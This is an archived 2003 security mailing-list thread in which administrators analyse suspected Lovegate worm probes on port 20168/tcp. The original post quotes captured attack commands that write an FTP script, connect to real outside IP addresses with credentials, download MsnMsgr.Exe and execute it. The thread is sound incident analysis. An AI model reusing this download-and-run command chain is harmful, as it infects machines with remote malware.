Security Incidents mailing list archives
FW: New Worm or Worm Variant?
From: "Bassett, Mark" <mbassett () omaha com>
Date: Thu, 11 Dec 2003 12:22:02 -0600
Looks to me like its building the wxtu.dll after it initializes connection. And then it uses that built file as a command input to ftp. So its doing ftp -n With input from wxtu.dll which is below open 211.26.130.118 USER noxe Noxe Binary Get MsnMsgr.exe bye so it is just a simple ftp script to download an exploit. Mark Bassett Network Administrator World media company Omaha.com 402-898-2079 -----Original Message----- From: Charles Hamby [mailto:fixer () gci net] Sent: Wednesday, December 10, 2003 1:36 PM To: incidents () securityfocus com Subject: New Worm or Worm Variant? I've been seeing a jump in 20168/tcp scans over the past week or so. This port is commonly associated with the Lovegate worm. I recently set up a port listener using Netcat to capture any output from probes against a couple of my systems. Shown below are the results: echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe At first glance it looks like some sort of non-interactive FTP session to download an exploit (MsnMsgr.Exe), but Googling for wxtu.dll came up empty (so this could be anything from a real .dll to a renamed executable in my mind). A couple of questions for the world at large: 1) Has anyone run across anything like this before? This looks like something automated to me. Worm script, perhaps. The IP I set up the port listener on had roughly 20+ probes on 20168/tcp from noon yesterday to 7am this morning. 2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this point. MsnMsgr.Exe seems to be the exploit itself, it it appears to be using something like FTPCOM to do a non-interactive FTP session, but wxtu.dll could be anything from a real .dll file to a renamed executable. Ideas? -cdh ------------------------------------------------------------------------ --- ------------------------------------------------------------------------ ---- ************************************************************ Omaha World-Herald Company computer systems are for business use only. This e-mail was scanned by MailSweeper ************************************************************ --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- New Worm or Worm Variant? Charles Hamby (Dec 10)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)
- Another New Worm or Worm Variant? David Gillett (Dec 11)
- Re: New Worm or Worm Variant? Juri Haberland (Dec 11)
- <Possible follow-ups>
- Re: New Worm or Worm Variant? Joris De Donder (Dec 11)
- RE: New Worm or Worm Variant? Charles Hamby (Dec 11)
- FW: New Worm or Worm Variant? Bassett, Mark (Dec 11)
- Re: New Worm or Worm Variant? Harlan Carvey (Dec 11)